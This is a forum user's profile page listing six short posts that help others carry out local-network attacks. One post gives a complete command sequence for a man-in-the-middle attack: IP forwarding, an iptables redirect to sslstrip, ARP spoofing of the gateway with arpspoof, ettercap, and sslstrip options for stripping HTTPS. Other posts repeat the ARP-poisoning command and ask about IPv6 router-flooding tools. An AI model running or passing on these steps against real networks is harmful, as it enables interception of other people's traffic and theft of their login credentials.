Jump to content

Solace

Active Members
  • Posts

    6
  • Joined

  • Last visited

Everything posted by Solace

  1. Also if you're doing this on a VM, make sure you're on a bridged network under network settings
  2. Everything should work... try following this exactly... sudo echo 1 > /proc/sys/net/ipv4/ip_forward uncomment the two lines in your etter.conf file sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 ifconfig to get your device name, let's pretend it's eth0 as well as the default gateway, we'll pretend it's 192.168.0.1 sudo arpspoof -i eth0 192.168.0.1 ettercap -T -q -i eth0 if you want SSL bypassing sslstrip -a -k -f
  3. Are you sure you're forwarding packets? Also are you using Ethernet or a WiFi card?
  4. You're going to have to ARP-Poison your network. Try arpspoof -i eth0 192.168.0.1 Obviously replace that IP with the ip of your router...
  5. Hey guys, If anyone's aware of THC's IPV6 attack suite against the IPV6 protocol, please lend me a hand. Flood_router26 and other tools in the suite only run on linux natively, the readme suggests they will not work on OS X. Are there any alternative methods for router flooding from native OS X? Thanks
  6. I believe your problem is that you haven't properly updated your firewall restrictions. By default SSLStrip listens on port 10000, assuming you're on linux, try this command if you're on BSD or OS X, try this
×
×
  • Create New...